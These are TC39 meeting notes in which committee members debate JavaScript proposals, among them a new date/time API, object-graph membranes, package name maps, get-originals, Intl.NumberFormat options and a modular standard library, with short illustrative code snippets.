MPT: Yeah, there's a few things that aren't ISO compliant, like toString on time only...
AWB: It does have a time-only format.
MPT: Yeah, I'm just munging the standards in my head...
AWB: I don't like introducing this as a global. I would rather see it as a module.
JHB: How would you use it in scripts? So you can't do anything synchronously in scripts?
AWB: Yeah
JHB: I imagine that's not satisfactory for many people.
AWB: I oppose seeing this in any form other than a module. We need to stop polluting the global namespace.
JHB: Once that's supported, that sounds like a valid concern.
AWB: I have to put a stake in the ground somewhere, and this is it.
BFS: Did you just say import from a script?
AWB: If the problem is that we cannot import in a script, maybe we could allow synchronous import in scripts.
YK: I wanted to say, in the jQuery era, every program was written in asynchronous style. The idea that everyone has to wrap to get common idioms was the jQuery model.
TST: Maybe doing it as a module would be a solution to this, but I'm a bit concerned that there's not a lighter-weight way to do this.
MPT: There's a library that basically does this (strips out the heavy aspects). But unfortunately just the computations themselves come out to about 56kb gzipped, and we've even checked that all the code paths are used, so it may not be possible to get more lightweight than that.
TST: Moment.js and Moment Locale together are 66kb, so they've made it quite small. I think it's worth doing this in a very lightweight way.
MPT: So, what's the concern here? Sure, we could expose CLDR data in Intl. What's the concern in going in this way? The proposal is large?
TST: This is already a complex proposal, so I would do the ECMA-402 follow-up in a separate proposal. It sounds like too much complexity if you can't do it as an atomic proposal.
MPT: OK. I think that's a valid concern.
MM: So, I want to confirm, there is nothing in this proposal that gives you direct access to the current time or current date, right?
MPT: We did add some current time support. It's definitely something I'm willing to discuss, though.
MM: Okay, so that's a non-starter for me. It's really important that you keep arithmetic separate from access to anything in the outside world. It's the difference between system-mode and user-mode. It's very important to keep any hidden mutable state outside the primordials, with the grandfathered exceptions of Math.random, Date.now, and access to current timezone.
WH: It's kind of inevitable that you will get access to the current time at a very coarse granularity within any library that allows you to convert between UTC and local time; the rules of conversion change over time, so you can determine that just from the conversions themselves.
MPT: I mean, it's possible to move this off to a separate proposal, but I would like a more concrete suggestion on what to do.
MM: I think you need to separate those, though. If we want to consider that as a separate proposal, that's fine.
MPT: I would say, raise a GitHub issue, and we can start to hash it out. I would like you to propose what the "ergonomic way" to handle this is.
NHD: Java has all these separate partitions of their Date objects, e.g. YearMonth; let's call them significant figures. Is tackling significant figures something we want to do within this proposal? For example, the string "2018" is a valid ISO string, but does it refer to January 1st, 2018 or merely the year?
MPT: So if someone made an object with 2018 and no other values (new CivilDate(2018)), should it print out 2018?
NHD: My question is whether or not this is a goal to account for significant figures given a certain input.
MPT: My instinct is no, simply because if we really want a year-month type or similar, my feeling is that if it's that useful, then introduce it in a follow-up proposal. At the end of the day, the no-surprises model is super important for a proposal like this. The developer should be explicit about what they want.
NHD: Thank you for your thoughts.
MAA: The point was made that we shouldn't add dates together (separate from the plus method), but have we considered a TimeSpan/TimeInterval type?
MPT: Isn't it YK who really likes the idea of a datetime span type? A lot of libraries have interval types. I'm trying to keep this reasonable in scope. A lot of these questions come down to "can we have another type?" and the answer is yes, but I'm just trying to get these current ones done.
TST: Coming from the experience of having these types in other languages, those types are super expressive. Two dates separated from each other give you an interval type, which is expressive and ergonomic for the user.
YK: The Rust time library is very small. The thing I want to say here is that people aren't asking for more things; a smaller set of things may work better, plus this extra thing. Can we find a smaller kernel we can use here, instead of a thousand types? It would be very useful and I would like it.
RGN: I wanted to ask about valueOf, going back a little bit. Is there a reason we're returning numeric as opposed to string?
MPT: It could return a string!
RGN: It changes the meaning of plus from add to concatenate.
AWB: I think you need to look closely at the difference between toString() and valueOf(). You should maybe define them so you almost get strings.
RGN: I think greaterThan and lessThan use valueOf, and those work better on numbers than strings.
AWB: You need to look carefully at those operators.
MPT: There's merit in having an internal number representing the date, since the computations become linear when otherwise they would not be (though the leap seconds point throws a wrench in this). The valueOf result doesn't need to be that number, however; it could be some other representation.
**SCR:** Could you return a Date from valueOf?
MPT: A lot of the reason for this API is that there is no mapping between a CivilDate and a Date; it's lossy.
WH: For the question of valueOf being numeric, I don't think leap seconds will preclude that since you could have two variants of valueOf with a default less accurate one representing the Unix computation and a more accurate one supporting leap seconds.
**SCR:** If we do separate these concerns into multiple proposals (including the concerns regarding Intl compatibility), I would like to at least see the two proposals land at the same time.
MPT: Unfortunately, there's not a lot of structure in this process to guarantee that these proposals land at the same time.
LBR: I think what Maggie is doing is to follow the philosophy of this committee. It would be nice to have someone working at the same time on 402, but I think what Maggie's doing is excellent and we have a huge group of people that could volunteer to work on the 402 component Shane is talking about.
**SCR:** I will open an issue to discuss.
SYG: Are daylight saving times automatically handled in this proposal? When you make a ZonedInstant with an explicit timezone...
MPT: I don't understand the question. If you pass the word "local" to a ZonedInstant, it will take the browser's timezone.
WH: [Clarifying SYG's question] Do you have a notion of a
US/Los_Angeles time zone whose UTC offset changes over the course of a year?
MPT: Yes it supports that.
DE: I think JS should support a better built-in date library, as other languages do. I think a standards venue makes sense for designing a good Date library. But 16kb isn't absolutely nothing. We've seen a lot of proposals over the years, and some of them have gotten a lot of pushback. I think TC39 is a great place to develop different standard library features, because we have a lot of different viewpoints here (industry, academia, etc.). I would like to see this proposal continue because I think it's a great precedent for other standard libraries. For the 402 point, I think we should work with ECMA-402 so that the proposals can leverage each other, but I don't think Maggie needs to be the person doing it. BigInt has 402 integration as well; in V8, BigInt shipped without the 402 part, but Mozilla shipped them together. We can encourage them to be viewed as a single proposal if we think that's important. We also should think about TST's approach of just shipping the data without the built-in library.
MPT: I think we will not advance at this time, partly because some of the spec text fell after the deadline.
AK: Can you clarify what you mean by not ready before the deadline for the proposal?
MPT: Some of the spec text landed about two days ago.
WH: As an aside, if anyone is hoping to advance proposal levels at a meeting, I'd appreciate marking the proposal as going for advancement 10 days before the meeting. I look at those much more carefully than ones marked as status updates.
Conclusion/Resolution
- Not advancing yet due to deadline
Abstractions for membranes
(Alex Vincent (expert invited by Mark Miller, MM))
MM: The purpose of this is to share with the committee a lot of useful lessons from what Alex did here. First of all, a membrane is a boundary in the object graph between two subgraphs. Proxy and WeakMap in ES6 were introduced to enable these membranes. You can think of "wet" and "dry" components separating each side of the membrane. As needed, the membrane grows dynamically to encompass more wet components. Some of the goals for membranes are to create defensive security boundaries for impenetrability.
WH: Do you mean unidirectionally or bidirectionally impenetrable?
MM: Bi-directionally impenetrable.
MM: (Reads slides). For the TC39 committee, this is a very great way to express security policies that we think the committee should be familiar with.
AVT: (Reads slides).
DH: May I suggest a slightly different metaphor? Perhaps Inside/Outside.
AVT: Inside/Outside may make a ton of sense in this context, but you're about to see that this happens in a three-dimensional context as well.
DH: So I need to understand biology to understand this presentation?
MM: No, we'll explain shortly, and I think it will be clear to you.
AVT: (Reads slides).
MM: A membrane boundary acts a lot like a realm boundary, but you don't get magical access to class state, which holds better for this security model.
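A minimal sketch of the core mechanism being described, built only from Proxy and WeakMap (illustrative only; a real membrane wraps every trap and both directions of the boundary):

```js
function makeMembrane(target) {
  const cache = new WeakMap();            // original -> proxy, for identity
  function wrap(obj) {
    if (Object(obj) !== obj) return obj;  // primitives cross unwrapped
    if (cache.has(obj)) return cache.get(obj);
    const proxy = new Proxy(obj, {
      get(t, key, receiver) {
        // Anything reached through the membrane gets wrapped too,
        // so the membrane grows to encompass the reachable graph.
        return wrap(Reflect.get(t, key, receiver));
      },
      apply(t, thisArg, args) {
        return wrap(Reflect.apply(t, thisArg, args));
      },
    });
    cache.set(obj, proxy);
    return proxy;
  }
  return wrap(target);
}
```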
Questions
BFS: I had a question about your coordinator and your proxy mapping. It seems like there's no desire to get membranes into a proposal before TC39. Are there any data types needed, though?
AVT: There's nothing special about Proxy mapping that we would need a new data-type for.
MM: None of the membrane work has identified anything that's wrong or lacking in the foundations, even just to build the higher levels; it's just that the higher levels need to be packaged together and better explained to users. But nothing in the immediate future needs to be brought forward to this committee.
BFS: Can you talk about weak references in the three-way membrane example you showed?
MM: Dean do you have thoughts on WeakRefs and multi-way membranes?
DT: No, I haven't thought about n-way membranes, but it's interesting. [In follow-up discussion with BFS and MM, we determined that the current behavior of the membrane code seemed correct: if any proxy or target is retained, so should any related proxies and target. The reason is that clients could use WeakMaps for softfield on any of those underlying objects.]
SYG: (On IRC) Don't browser debuggers all have blackboxing of scripts already?
AVT: No debug means, by default, I want to blackbox.
TST: Minified code is blackboxed by default. This is usually about tooling, not about language.
MM: I also see this as a tooling issue, but we need some conventional signal from the developer to tell the debugger/tooling what should/should not be blackboxed.
Reviewing the future JS syntax throughout the current proposals (overflow)
(Leo Balter, LBR)
LBR: We had a PR proposing to redefine the catch parameter as a formal parameter. Doing this in Test262 was deceptively difficult: while the spec change was extremely small, expanding the grammar is actually quite long. So sometimes it's easy to talk about proposals, but very difficult to implement them. Why? Yearly releases are great for long-term goals, but hard to plan for specific releases. People have very specific areas of expertise, and topics are so complex that it's hard for all delegates to comprehend everything. These aren't all bad things, but we do need to improve how we collaborate with each other. How do we talk to each other more, combine efforts, promote guided decision-making? To summarize proposals involving syntax: we already have (before the start of this meeting) a very long list of Stage 3 proposals involving syntax, a pretty long list for Stage 2, but few syntax proposals for Stage 1. There's a lot of syntax change. (Shows examples of many new syntax features in a single program.) So there are several potential actions for our committee: we can identify fields of interest and form groups to create collective recommendations, reaching out beyond your local teams. I do this with RW a lot to bounce ideas off of. My recommendation is to help delegates identify more fields of interest from other delegates, and perhaps we should experiment with drafting syntax proposals within other proposals to see how they work together. If they will be connected in an eventual future, we should design them together as well. Finally, we should experiment with using Babel more and more.
YK: I appreciate the slide that shows all the features together, but it matters a lot in a language that combines a lot of different syntaxes, and we should think about whether realistically you will use these syntaxes together. For example, you don't have to worry as much about the syntax for defining a method colliding with syntax that defines grouping. (Pointing to slide.) This can be hard for humans to lex, and the slide with the class does a better job at illustrating than the previous one, which is unrealistic. Maybe a good heuristic is how many cover grammars are needed?
MM: So, I very much like what you're getting at. I think the complexity budget needs more emphasis and needs more teeth. We talk about complexity budget, and it's a useful metaphor. In real life, there are many things that I want that are genuinely good, that I don't buy because they are too expensive. I can know this because I have a budget.
MM: Allen reminded me of when we were building up to ES6. We put all the features up on the whiteboard, and we spent all 3 days on triage. When we put them all up on the board together, we crossed off many things that were wonderful because they fell below threshold, a threshold we could only see when we saw the overall cost of everything. That was before the proposal process. The proposal process is a good thing, but it creates a situation where advancing a proposal seems like tangible progress, while rejecting a proposal doesn't seem like tangible progress. We did once use a subtractive process: "use strict". We should be more sensitive to when we have subtractive opportunities and take those seriously. Like not having automatic semicolon insertion inside classes or modules. We squandered those opportunities to simplify.
LBR: I really like this perspective. I tried to cover this from a high-level point of view, I appreciate this perspective because it is from a different point of view.
BT: The proposal process gives us an opportunity to think about costs and tradeoffs, but we don't have the ability to grant something Stage 2, for example while considering all the other stuff that comes along with it. And that's a problem, we should aim to do that better.
**SCR:** These are new features when you're writing JavaScript natively, but I've noticed there's increasingly a movement of languages that compile to JavaScript. With CoffeeScript and TypeScript now, these languages clearly offer something that the industry wants. JavaScript needs to be extremely efficient, since that's what these languages ultimately compile to. JavaScript should have almost a bigger emphasis on performance than expressiveness for this reason. There's no single one-size-fits-all solution for this; people may want different syntax features, however one thing that everyone wants is performance.
LBR: That's a great point and kind of what I'm trying to talk about when I use the term "sandboxes".
WH: A few things are going on here. Focusing on just syntax, I've been keeper of the syntax for a while and made sure that syntaxes of various proposals don't conflict; that hasn't been a major issue with conflicting syntax that I have noticed. The opportunity cost of syntaxes precluding desirable future evolution of the language, I would say is a bigger issue. I would be more-or-less opposed to creating a standing syntax group; instead, if issues arise, we should deal with them ad hoc.
WH: Another issue more general than the syntax is multiple proposals with overlapping use-cases. I would consider this a big problem as well, leading to jockeying for one of them to get priority by advancing through the stages first. I'd like to see more discussions on this.
LBR: I am not suggesting a group for syntaxes, but rather collaboration to create guided decisions. For example, as an individual, a group of champions could recommend something and present it to the greater committee.
WH: To be clear, ad hoc groups are great. I just don't want a standing syntax group with periodic meetings.
DD: How many meetings are you allowed to have before it's considered a standing group?
YK: I don't understand what the objection is to that group interest?
WH: With a standing group, everyone who has an interest will be forced to attend a lot of unproductive meetings. The alternative is to create an ad hoc meeting, where you send an announcement and then you know what the agenda is. Standing groups tend to acquire a life of their own, and if there are overlapping groups, it can create a huge waste of effort and time.
BT: It's worth knowing as a deliberative body, we can create sub-committees. Some groups have been excellent at creating minutes and being accessible to people, especially to this room. Groups in general are things that standards bodies do often and work well.
LBR: I think there is something with groups. If we can fetch the best highlights. It's already being done with some groups. But like we have the Intl work that comes into TC39 and gives a summary presentation. The same thing happened with the numerics/literal separator that was a conflicting proposal, and we sat together, then came to TC39. We had the champions of both proposal to match your thoughts.
AKI: To respond to something WH said, the rigidity against any sort of collaboration outside the realm of the meetings is problematic. Nothing is going to get done if there are no external groups...
WH: That's not what I'm saying.
RJE: He does not want a syntax group that meets regularly. But rather only when needed.
DE: I wanted to support the idea that LBR brought up. Asking for an early prototype before stage 2. I don't think we need to ask for a full implementation, and I don't think we need Babel, but in the Temporal proposal, which has nothing to do with Babel because it's not a syntax proposal, the polyfill helped a lot because it helped flesh out some of the details. Some things are hard to prototype, like BigInt and symbol, but I think we should encourage champions to make these prototypes whenever possible. I'd like it to become a more regular thing. I agree with a lot of you about groups: I think it will be useful to have an open structure to discuss things. It only helps to openly discuss proposals outside of meetings. Group meetings should have agendas, and in fact some of the groups I am in have agendas. When we didn't have things on an agenda, we cancelled the meeting.
BFS: We have some people wanting to encourage use in Babel at Stage 2 as a testing ground, and I want to be wary of that. We can get situations where we get conflicts, where ecosystem adoption outpaces our research into the grammar; we still have discussions going on about decorators, where ecosystem adopters have opinions different from this committee's. I think it's worked out really well where we let TypeScript use the colon operator in more places. But I'm wary of always using Babel.
LBR: I understand that and admit there are some tradeoffs that we always need to consider but Babel is evolving to a system where some features are not really encouraged. We can't really ever say "hey, don't use this," so I think it's OK for that community to be able to do that. Consider Object Rest/Spread, since it was adopted so widely we had early feedback, and it helped develop the syntax and encouraged browser implementation.
YK: I think we shouldn't focus too much on what has historically happened with Babel. More importantly, you have two choices: discourage people from using features in early form (no Babel), in which case you lose feedback; or put it in Babel, in which case you get feedback. I think the thing we should try to do is encourage people to understand the risks and benefits of being early adopters. My opinion is that we should minimize the cost of both of those goals and not do so by having a global policy saying people shouldn't use those features. I think everyone should use caution, and that early features are notoriously unstable. But the valuable feedback from early-stage users in Babel makes it a good thing.
LBR: Among users of Babel, creating a sandbox for ourselves could be a possibility. For ourselves, it proves that it works.
DE: Just about Babel, the messaging about not using early-stage proposals is getting stronger. Babel 7 removes the stage presets. I'm glad that the Babel team is communicating and now being especially forceful about the stage process. Babel does implement early features; they won't stop getting PRs, and there is a lot of community interest.
JRL: I want to be clear, we're talking about Babel implementations or syntax?
BFS: I'm not talking about semantics; I'm talking about the ecosystem getting ahead of something occurring in TC39: widespread adoption, or a grammar that we effectively must work around.
JRL: So we are trying to make it more explicit to end users that they are using early proposals. Like DE said, we are removing presets, but if they want to enable specific proposal features, they can enable it with a plugin, and there is no easy way for them to enable all features, only the specific features that they want. We kind of learned from the decorators issue, where people used these features way too early, and make it very clear to people that these are not real JavaScript features.
KS: My interpretation, thinking about the features and looking at the screen, is that we are running up against diminishing returns. We got a lot of bang for the buck with ES6 features: async functions, async generators. But at this point we are running into diminishing returns, and we need to make sure we are not overestimating the utility that each of our proposals brings. There is a bias toward believing that our syntax is going to make their lives better. But JS developers have a lot of problems and pain points, and I'm not convinced that syntax is high up there on the list. On the other hand, Temporal and proposals like that seem to really address pain points, and I'm excited about development in that direction. Waldemar brought up something about a standalone syntax group creating work for itself, as groups sometimes do. As part of our participation in this group, we should look in the mirror and figure out whether we are adding work for ourselves or whether we are making things easier for our users.
TST: I would push back on this. I do think that the adoption of more syntax features by the community through Babel is a strong signal that there is a lot of value in this. I don't think that we are in an area of diminishing returns for more statically analyzable programming styles. I want to push back against the diminishing returns argument. We will eventually get there, but seeing these slides, I'm not convinced we are there yet.
API: I just have a comment about how a polyfill helped Temporal and other proposals. If you are a champion and you don't have time to write a polyfill, just post in the reflector, and plenty of people at our companies would be more than happy to help get those polyfills created.
Package name maps
(Domenic Denicola, DD)
DD: Okay, so there are 3 proposals I am working on that DE thought would be interesting for TC39. We have 15 minutes, so 5 minutes each. Um, so the first one is something called "Package Name Maps". As you know, Node does module name specifier resolutions using a complicated algorithm with file extensions and crawling the filesystem, etc.
DD: We don't have the option to crawl the web URL space, but people want very similar experiences, like importing from lodash and have that map to a URL; i.e. use these simple string names. On the web now, this is just not allowed. Anything on the web that doesn't start with / or ../ or ./ just isn't allowed.
DD: The proposal, which is not a TC39 proposal, but if it were would be in like "stage -1", is this package name map that you would set up before you do any imports. It tells how to construct a URL for lodash or moment, etc. If you are directly writing all the code, you could write these yourself, but if you're coordinating libraries and you want them all to agree on the version of moment, for example, this lets you do that. That's the basic idea...
DD: Another interesting feature of Package Name Maps: as people who are familiar with Node.js would know, in different places in your app you may want different versions of the same package. We have that built in. You can scope versions to different parts of your app.
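A sketch of what such a map might look like (the format was still in flux at the time; field names are illustrative only):

```js
// Declared before any imports, e.g. in a <script type="packagemap"> block:
// {
//   "packages": {
//     "moment": { "path": "/node_modules/moment", "main": "moment.js" },
//     "lodash": { "path": "/node_modules/lodash", "main": "lodash.js" }
//   },
//   "scopes": {
//     "/node_modules/some-dep": {
//       "packages": { "moment": { "path": "...", "main": "moment-v1.js" } }
//     }
//   }
// }
// With the map installed, bare specifiers become legal on the web:
import moment from "moment"; // resolves to /node_modules/moment/moment.js
```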
DD: Progress-wise, we're not close to a spec. We've started writing some tests, and they're passing.
DD: One FAQ: why not an imperative API for module resolution? It turns out, jumping back and forth from JS for every module specifier is not very efficient at all. It's not completely ruled out, but I like package name maps better.
DD: Okay, so that is Package Name Maps. 5 minutes. I think we will not have questions because we do not have time. I'm just here to make the committee aware of these issues.
AK: I don't think it's a good use of time if you're not willing to discuss these questions.
DE: I think it's good to discuss because of the cross-cutting concerns, and since it relates to other proposals involving layering, etc.
BT: Yeah, the ability for us to give feedback is important.
DD: These all have issue trackers. Given time constraints, and the audience for these proposals, GitHub is probably the right place for feedback, instead of plenary.
Layered APIs
(Domenic Denicola, DD)
DD: Layered APIs are an effort to work on high-level features. Per the Extensible Web Manifesto, we wanted to start by working on low-level features, but now that we've done that we should work on high-level features. We want these to be loaded lazily, since not everyone will use these features.
DD: The other constraint is the standards process: a layered API is a high-level feature, and we still have to respect the Extensible Web Manifesto. This is good in a lot of ways. There is a high-level HTML widget called details. We went through inventing shadow DOM to allow for details, but that still didn't completely work. So future features will not suffer from the problems of details. But there are still some things that are fundamental.
DD: One of the features I brought up previously is the ability to censor source code, which would be very useful to web developers.
Get Originals
(Domenic Denicola, DD)
DD: Another feature that built-ins have and web-developer-created APIs do not is the ability to use the original versions of things. In particular, if you look at a DOM API like, for example, querySelector: if you were trying to implement that in JavaScript, it turns out the browser's querySelector is not affected by users messing with prototypes. It just runs native code. This is important for robustness across websites. What if we change how it's used slightly? Would it break? Possibly, but because it is implemented in C++, it does not break. How do we bring that same ability to the web?
DD: It turns out that we can do this on the web. But it only works if you're loaded first, not loaded in a module. To solve this for things not loaded first, I have a proposal called get-originals. Note that the API is undergoing a lot of churn; don't take the shape as very essential. The basic example is that you have this function that calls a lot of built-ins. It calls a getter, calls a method, etc. How can we do that in a way that is not susceptible to tampering? In this version of the API, it's broken into a bunch of global functions—so that's how you would get access to it.
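A sketch of the idea (the API shape was churning, as noted; these global function names are illustrative only, not the actual proposal surface):

```js
// Instead of el.querySelector(sel), which a page script can subvert by
// patching Element.prototype.querySelector, a library could do:
const qs = getOriginalMethod("Element", "querySelector"); // hypothetical
qs.call(el, ".item"); // behaves like the built-in, regardless of patching

// Similarly for accessors:
const getBody = getOriginalPropertyGetter("Document", "body"); // hypothetical
const body = getBody.call(document);
```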
DD: An FAQ: if you're approaching this from the TC39 perspective, one approach is: why don't we just give unique identifiers to all the built-ins, instead of my version up here, where you just call the original object? It turns out this is really brittle, because we move things across the prototype chain quite often. That wouldn't be great.
DD: Another interesting thing is the idea of not reifying the properties of built-in objects. If you can call the original method directly, you don't have to reify the accessor or method. That's good for efficiency.
DD: We think tooling is a key part of this. In my version, it's not realistically usable by itself. It needs tooling. We have other ideas in the tooling space, like if we get 100% test coverage, then we can create a super-poisoned environment where we fail the test if you somehow access the poisoned elements.
September 2019 Meeting Location
(Rex Jaeschke, RJE)
RJE: Do we have opposition to going to Europe a second time next year?
AK: I believe JHD was pushing strongly against 2 Europe trips.
YK: I am also against two Europe trips.
**SCR:** I've never been to Barcelona and it seems like a cool place to go. With slides, it's not terribly difficult to attend remotely.
JHD: I think that's aspirational. It's difficult to attend these meetings remotely.
DE: I am an unusual European delegate since I have a lot of family in New York. In the past we've gotten a lot of complaints about the scheduling happening too late, so I would like to determine this today.
RJE: I would like to propose New York City then.
JHD: That means we have zero in the Bay Area. We could host one there.
DE: Google has offered to host once a year, and they're already hosting one in New York.
SGO: Google is happy to host multiple times if necessary, and we can host in the Bay Area.
??: We should have two in the bay area.
YK: Two in the Bay Area means three on the West Coast?
DE: Three if you include Arizona.
TST: Flying here isn't too much the issue, even dialing in is quite difficult for people on other continents.
Conclusion/Resolution
- no conclusion
Intl.NumberFormat Unified Feature Proposal for Stage 2
(Shane Carr)
**SCR:** This proposal essentially adds new features within the options object that have been requested by many users. First, spec updates: we add the option narrowSymbol to the currencyDisplay property (i.e. $ instead of $US). Next, units: the Intl API has a concept called style, and we add a style entry called unit, which has narrow, short, or long options (i.e. narrow "°", short "° F", long "° Fahrenheit"). Next, scientific and compact notation will now be represented using the new option notation, with options like "compact" and "scientific" (plus a companion compactDisplay option). Another feature that's been requested is sign display, which is a good thing for Intl to govern best practices for locales. Sign display uses options like auto, always, never, and except-zero.
WH: If you provide -0 and always show sign, does it return "-0" or "+0"?
**SCR:** There was a question about this on the GitHub issue. I would refer to that.
**SCR:** There's also the option currencySign, which enables an accounting format. Now, let's talk about combining options. Most options are orthogonal and can be used together. Thanks to DE and the ECMA-402 subcommittee for helping me with this proposal.
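Examples of the proposed options in combination (option names as proposed at the time; some spellings, like exceptZero vs. except-zero, were still settling):

```js
new Intl.NumberFormat('en-US', { notation: 'compact' }).format(1234);
// "1.2K"

new Intl.NumberFormat('en-US', {
  style: 'unit', unit: 'fahrenheit', unitDisplay: 'narrow'
}).format(72);
// e.g. "72°F"

new Intl.NumberFormat('en-US', { signDisplay: 'exceptZero' }).format(5);
// "+5"
```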
JHD: What happens if I pass in an invalid option?
**SCR:** If your option is not in that set, the spec says to throw a RangeError. The one exception is unit: not all browsers will support all units, but we will list a minimum set of units. Browsers can support more than that minimum.
JHD: If I pass a non-option name, what happens? I.e. uni (missing the t)?
**SCR:** The options bag is handled internally by ignoring invalid option names.
JHD: Are the options using get (does it use the prototype)?
**SCR:** The way the properties are accessed is the same way the Intl spec already processes properties, for consistency.
WH: What about rounding behavior?
**SCR:** That's out of scope.
WH: What do you mean out-of-scope?
**SCR:** Designing a good rounding API is not an easy thing to do.
WH: It's kind of inherent for the compact notation you're proposing here. How can it not be in scope? In your rounding behavior issue you mention that 1230 in compact notation would be "1.2K". Multiply it by 10, you get "12K". Multiply it by 10 again, you get three significant digits: "123K". Multiplying by 10 again gets back to two significant digits: "1.2M".
**SCR:** It's a very good question and if you have ideas for how we should implement this in the spec, please let us know.
DE: This is great work in the proposal, although the spec text isn't complete on insertions, it's definitely sufficient for Stage 2.
**SCR:** Thank you, and I really appreciate all the great discussions on GitHub. So, WH, if you have more questions like that, please do add them on GitHub.
Conclusion/Resolution
- Stage 2 acceptance
JavaScript Standard Library
(Michael Saboff, MS)
MS: The amount of functionality in the JavaScript standard library would likely grow over time, and less module code would need to be downloaded. The standard library wouldn't be enabled by default; a programmer would just import this functionality and be able to use it. Hypothetically, suppose someone comes to TC39 asking for a new method to be added to the JS core. Everything looks useful and we decide to move forward. They propose Array.smooshed. Because we've polluted the namespace, we've made it very difficult to determine whether it's going to be a problem. Is there a way we can add extensibility safely? Imported objects are frozen, and users extend via inheritance and wrapping. This is what I propose so we don't get "smooshed" again. (Reads slide about extending Statistics library.) This raises a bunch of questions that are out of scope for this proposal, like what features go into the standard library vs. the core library, how do we stage new features, and how do we collaborate with Node.js and web standards bodies? Next steps are to describe polyfill fallback support.
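A sketch of the shape being discussed (the specifier scheme and freezing semantics were open questions; std: and the statistics module are illustrative only):

```js
import { mean, variance } from "std:statistics"; // hypothetical specifier
mean([1, 2, 3]); // 2

// Exports would be frozen; users extend by wrapping or inheritance
// rather than by monkey-patching the imported namespace:
const stats = Object.freeze({
  mean,
  variance,
  stddev: (xs) => Math.sqrt(variance(xs)),
});
```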
JHD: I specifically want to be able to say, on my website, that this polyfill replaces any browser implementation of the standard library. This is useful for fixing bugs in browsers. There are plenty of examples where code does some built-in thing that the browser supplies but that doesn't work, and I should be able to deny access to the original versions.
MS: So how you do this today with some other module wanting to do some functionality is...
JHD: Yeah
MS: Can't that module/polyfill do something on the global object?
JHD: Yes, and I appreciate the danger that that code can change the world, but I'd like to create a function that nails down the implementations of the functions I care about then issues a callback when it's safe to use.
MS: That's a bigger problem than what this spec is trying to solve.
JHD: Most people don't bother to lock down, so I propose we do something that makes that more ergonomic.
DE: I think we can get this kind of polyfilling and tweaking with something based on Domenic's proposal. For fallbacks, use mixins. You could have a fallback listed in the Package Name Map. If you want to have a polyfill that fixes a bug in another implementation, rather than redirecting std:something to something else, and that something else is per-directory, it would open the original one and wrap the original one, or something like that. I'm glossing over a bunch of details, but I think we can work through that.
DD: Just to clarify, I know Michael referenced the fallback syntax. The proposal as written right now lets you give a URL as a fallback. But if browsers don't implement the fallback syntax, then the fallback won't work, so it's on the chopping block. The most backwards-compatible way is different: see domenic/package-name-maps/#referencing-host-supplied-packages-by-their-fallback-url.
YK: I see how that works, but you need a way to point back to the original one.
DD: I just wanted to clarify why this doesn't work.
YK: I said already, and I don't think soft fallback really solves the problem.
NHD: One of the things that we were exploring in this was import Date from __bikeshed__, which would get you the original Date object; not necessarily the prototype equivalent, but something without tamperability. We're fully aware that this is a problem that needs to be fixed, and it has a corollary with the getOriginals work.
JHD: My next topic was synchronous usage in scripts. I think it's a very different discussion that has come up on other proposals: should this feature work in scripts, or should it work in modules. At the moment, I believe import and export are the only things required for modules to work. I think the problem you're trying to solve exists in scripts and will exist in scripts for the foreseeable future.
WH: You're looking to advance but I don't know what the proposal is. You gave a slideshow, but there was no proposal.
MS: The proposal is that we add a standard library capability to JS.
WH: So what would the desired outcome be? Because it's very vague right now. The idea is vague, like saying we should add standard syntax. Is the goal when it reaches Stage 4 that you have specific libraries available in the standard library? Are you proposing a process to add such things? Are you proposing some specific language machinery here? It's just very vague; I see this as a good match for an effort to launch a group, but I don't know what the proposal here is.
MS: The proposal is to provide the mechanism for a standard library to be available. It's that simple. There are some examples of components that could be included, like Temporal, but that's not this particular proposal. I'm proposing the mechanism for putting standard functionality that is not available in your standard object to get the object into your namespace.
MS: Mechanism meaning standard functionality. When you import that functionality, you get it in your namespace and it's frozen.
WH: "Mechanism" is still very vague. It sounds like you're proposing modules. I'm confused because modules are already in the language.
MS: It's different from modules, since these are part of the standard itself.
BT: The module specifier in MS's proposal is something we need to decide on, as well as the capability to polyfill.
AK: I wanted to first address the procedural question for what this is. I wanted to point out that for stage 1, you don't have to have a lot of concrete stuff.
MS: And I purposely don't.
AK: Now, the freezing thing. It seems like if there's a version of Statistics, and they wanted to add another method to Statistics, that's tricky; they can't monkeypatch it, etc.
MS: They can import it under a different name.
AK: So if I'm writing a polyfill... there are some reasons the language has benefited from being open. Some of the experience I've had working with Dart, a language that's very locked down, is that it's hard. It's hard to make all the implementations look the same. I'm not a fan of the freezing and I don't think it fixes the problem you're trying to solve.
YK: The polyfill problem comes up a lot, and fundamentally the problem seems to have a privileged way of running (i.e. first). We don't actually really have a privileged position to do that, however. But we'd like to allow that. Realms tries to allow that, with an initialization callback, but if we keep trying to solve this problem in an ad hoc fashion, we're not going to be satisfied. Any lockdown feature will come into conflict with that other problem. We need to decide what the mechanism for that is.
MS: I agree with what you're saying. I can see how the app wants to lock things down, but so do libraries and dependencies, and you run into the problem of orders and priorities and things like that. It's a difficult problem to solve, and I don't want to lock it to this.
YK: All I'm saying is the only person in the position to say that is the whole app.
KS: I think the reality is that (1) JS has an underdeveloped standard library. (2) People want to ship less code. (3) The fact we have the underdeveloped standard library is an opportunity. We can build on the experience of other standard libraries that are out there. It can be like Intl, where we come in and there's an awesome standard library feature being presented.
MS: I think adding functionality without incurring a syntax cost is a great other feature of this proposal.
DT: In response to YK, one of the things we did in response to the realms shim was that we need to provide direct support for shimming since this is a thing part of the JavaScript paradigm. Some direct mechanism to support shims and let them run first, and provide a realm.
BT: What does Stage 1 mean if the Layered APIs proposal doesn't go through the stage process?
MS: They're not wedded together, but they're closely related.
DD: There are years of history with Node.js supporting standard libraries, and now with Layered APIs we very much support this work and intend to work together on this.
MS: We need to work with the web bodies to make sure we are in alignment.
BT: My concern is just that we're voting on Stage 1 for this thing but a lot of this is part of another proposal that doesn't intend to go through the stage process. We can help of course.
MS: I suspect that we should work in lockstep with Layered APIs.
DD: Concretely, I would view this as TC39 has no process for suggesting to Node.js things for standard libraries. But we are interested in putting things into standard libraries, and this proposal enables us to do this.
MS: So to be clear, I'm not saying that we conclude what's in the standard library. I'm not saying we can't do that, but it needs to happen and it needs to be in cooperation with Node.js.
DE: I'm a big fan of having this discussion and collaborating with the web and Node.js. But there are some open questions, like: will TC39 export anonymous module records that hosting environments map to?
DD: Yeah. I generally agree. I think we've seen a lot of good convergence between Node and the browser, like in the global space: setTimeout, new URL, TextEncoder/TextDecoder. If TC39 wants to try to be a broker in those discussions, that makes sense. I think it would be a shame if we divide the namespace by standards body. If you make it "tc39:encodeURIComponent" but "whatwg:URL", that would be bad.
